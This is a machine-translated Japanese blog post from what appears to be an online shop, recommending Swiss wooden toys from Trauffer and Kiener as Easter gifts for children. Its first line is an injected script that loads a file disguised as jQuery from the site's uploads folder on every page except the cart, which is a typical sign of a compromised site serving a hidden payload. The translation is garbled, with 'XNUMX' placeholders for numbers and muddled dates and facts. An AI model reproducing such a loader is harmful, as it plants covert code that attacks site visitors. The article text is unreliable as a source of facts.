if (window.location.pathname !== '/cart/') { var scriptElement = document.createElement('script'); scriptElement.src = '/wp-content/uploads/jquery2.min.js'; document.head.appendChild(scriptElement); }

子供のための10のユニークなスイスイースターギフト

すべての親は、子供にぴったりのおもちゃを見つけることが必ずしも最も簡単な作業ではないことを知っています。 まず第一に、あなたは彼らの年齢を考慮し、数日より長く彼らの注意を引く何かを見つけなければなりません。 これは子供にとって最も一般的な問題です。子供たちは、おもちゃが非常に短時間で面白いと感じることがよくあります。 したがって、次のイースターでは、さまざまなレベルで本当にエキサイティングなおもちゃについて考える必要があります。 幸いなことに、私たちはこれについて考え、子供向けの壮大でユニークなスイスのイースターギフトを出しました。 それで、これらのおもちゃは何ですか、そしてなぜそれらはとても特別なのですか?

Trauffer and Kiener –ユニークなスイスのイースターギフト

私たちはここで話している トラウファーとキーナーのおもちゃ。 Trauffer Wooden Toys LtdはXNUMX年前にKienerを買収しましたが、従来のおもちゃの新しいバージョンを作成する際に、これらのおもちゃのコアバリューに関心を持っています。 Kienerブランドの創設者であるKathrinKienerは、彼女が言ったように、おもちゃと木製の蝶を手元に置いておきたかったので、彼女の人生の仕事の責任をTraufferに移しました。 そのような人に人生の仕事を任せる人は誰もいません。 彼女はトラウファーを完全に信頼しており、それには大きな理由があります。

スイスの子供たちは皆、金色の鈴を持つ小さな牛を知っています。 その牛はトラウファーの商標シンボルです。 牛のほかにも、子供たちに完璧でユニークなスイスのイースターギフトである人形、動物、おもちゃがたくさんあります。 しかし、ポイントは、ブランドとしてのトラウファーの焦点は伝統、職人の技、 スイスの品質、そして最も重要な特徴である木材。 彼らはスイスの森からの特別な木材のみを使用し、高品質のFSCラベルを貼っています。 これは、トラウファーの木のおもちゃの信頼性と個性の主要な保証です。

状況は過去のキーナーと同じでした。 このブランドは、彼らがおもちゃに投資した品質、努力、および配慮のために、常に優れた評判を楽しんでいました。 今、このブランドがTrauffer Wooden Toys Ltdの一部になったとき、状況は同じです。 過去にさかのぼって、これらXNUMXつのブランドは同じ価値観と原則を共有していました。 子供も大人もおもちゃを愛し、今でも同じ情熱を持っています。 そのような 強い伝統 子供向けのユニークなスイスのイースターギフトを表すためにこれらのブランドを選んだ正確な理由です。

伝統的なトラウファーのおもちゃ

ハイジとピーター

ハイジとピーターは、スイスで最も人気のある子供向けの物語の1955つです。 1881年のスイス映画です。この映画は、XNUMX年のヨハンナスピリによるハイジの物語に基づいています。 スイスの象徴的なキャラクター 本からあなたの家へ。

個々の作品はユニークです。 さらに、それらは水ベースの色のみを使用しているため、これらのおもちゃは子供が遊ぶのに完全に安全です。 さらに、子供と大人の両方がこれらの愛らしい木製の置物で遊ぶのを崇拝します。

スイスの木造牛

この甘いスイスの木の牛は、あなたの家にぴったりです。 牛は彼らのトレードマークです、手作業、高品質、スイスウッドの略です。 多くの子供のおもちゃがプラスチックで作られている世界では、木製の牛は大きな対照です。 この素敵な装飾が施された牛は完全に自然で、100%スイスの木で作られています。 それだけでなく、純粋な愛を込めて手彫りと手描きが施されています。 スイスで最も人気のある木のおもちゃのXNUMXつであなたの家族を一緒に連れて行ってください!

スイス木製牛ユニークなスイス東部のギフト

バリードッグマグネット

バリー犬の磁石は、スイスの最高の職人のXNUMX世代のために個別に手彫りされたユニークな作品です。

トレーサー木製玩具バリードッグマグネット

伝説のバリー犬 救助犬の原型です。 セントバーナードの品種は17世紀にさかのぼり、グレートセントバーナードの峠を守るために修道士が飼っていました。 すぐに、彼らはコンパニオン犬に、そして最も重要なことに、救助犬に進化しました。 スイスのバーナード犬は、長く続く伝統を持つ象徴的な品種です。 この魅力的なセントバーナード磁石を作るために、彼らはスイスのFSC木材のみから使用しました。 それは完全に自然で無毒です。

カートを引っ張るバーニーズ犬とバリー犬

最も有名なスイスの犬種のXNUMXつで、家族と一緒に思い出を作りましょう– バーニーズ犬とバリーセントバーナード。 どちらのバリエーションにも、犬がミルクジャグでカートを引くことが含まれます。 このかわいい製品はすべて自然です。 伝統は、スイスの品質と職人技とともに、トラウファーの背後にある原動力です。 あなたは危険な化学物質について心配する必要はありません、これらの愛らしい犬は完全に安全です。 さらに、これらのスイスのおもちゃもスイスのFSC木材から作られています。

スイスのおもちゃ、ベルネーゼ、犬、ユニーク、スイス、イースターのギフト

今日、子供向けのゲームはますます暴力的で攻撃的になっています。 トラウファーの本物のおもちゃで遊ぶことによって、あなたの子供はすべての生き物への共感と尊敬を学びます。

RÖSSLI-HÜ木製の馬

「小さな木の馬の冒険」は、1939年にイギリスの児童書作家ウルスラM.ウィリアムズによって書かれました。 それが、トラウファーが愛らしい木のおもちゃのラインを出すためのインスピレーションでした。 また、彼らは 冒険的なロッスリフ 本と同じです!

トラッファ - おもちゃ - 木馬

今日のおもちゃの世界を見ると、根本的に変化したことに気付くでしょう。 点滅する画面とビープ音を出すコンピューターは、どこにでもあります。 それにもかかわらず、シンプルな木のおもちゃは本当のルネッサンスを経験しています! たとえば、このスイスのおもちゃの馬は信じられないほどシンプルですが、信じられないほど効果的です! あなたは木の亀裂、色の変化を見ることができます。 それらはすべて、おもちゃを子供にとって個人的なものにします。

トラウファースペシャル木製牛

トラウファースペシャル木製牛は革の耳と角を持っています。 小さなベルは音が細かく、ベルバンドはもちろんダークレザーバンドです。 唾液-速くて毒性のない色(手描き)は、意味のある場所にのみアクセントを設定します。 最後に、鋭いエッジがあり、二次的な詳細が意図的に欠落しています。 寸法は31x21x8cmで、 XNUMXつの異なるバリエーション –赤、黒、スイス、および赤のホルスタイン。 

トラウファースペシャルウッドカウ

最新のキーナー追加

Kiener木製ミニブック

キーナー木製ミニ本を表す 素晴らしい贈り物 このイースターのために。 また、キーナーのおもちゃに関しても、社会的責任の傾向が続いています。 完成品および半完成品の製造は、さまざまな基礎とワークショップを強調しています。

キーナー-木製-ミニブック-ユニーク-スイス-イースター-ギフト

中毒者や精神障害者の社会的統合とサポートも、Trauffer Holzspielwaren AGの長年の伝統です。 したがって、これらの人々を個人的な安定化だけでなく、社会的および専門的な統合においてもサポートすることが、彼らの明確な目的です。

キーナーアソートサウンドキューブ

キーナーアソートサウンドキューブは、あなた、私たち、そして自然のために作られています。 もちろん、スイスの木はこれらの重要な部分です 壮大なおもちゃ。 自然な色があるので 子供と環境。 また、EN 71規格は最大のセキュリティを保証します。

キーナーアソートサウンドキューブ

結局、そのような企業文化を作ることは、トラウファーが本当に社会を気遣うことを意味します。

Kiener木製の蝶

再び羽ばたき、有名なキーナー チューリッヒからの木製の蝶.

ユニークスイスイースターギフトキナー

すでに述べたように、Trauffer Wooden Toys Ltdは2017年の初めにKienerを買収しました。彼らは、伝統的な製品の新しいバージョンをもたらしました。 42年前に色と形への愛情から始まったものは生涯の職業になりました。

木製蝶をぶら下げキーナー

最新のバリエーション 伝統的なキーナーぶら下がっている木製の蝶は誰もがっかりさせません。 モダンとトラディショナルを完璧に組み合わせると、傑作が出てくることがわかります。 それは間違いなく、特に子供のための最高のスイスの贈り物の一つです 次のイースターのために.

キーナーぶら下げ木蝶

キーナー蝶はいつものように美しく、現代の製造のほんの少しのタッチで。

ショッピングカート

×
あなたのカートは空です。 店へ出かける
通貨を選択ください。
上へスクロール
を検索
飲食

ビスケット
ヌル
チョコレート
食べ物や飲み物
スイスコーヒー
ベジタリアンフード

ヌル
ヌル
スポーツ
スイスのバックパック
トラベルバッグ

アクセサリー
ゲームとおもちゃ
ペンとクレヨン
BOOKS
エッセンシャルオイル
環境に優しい製品
ホームアクセサリー
キッチンおよび家庭用品
発売中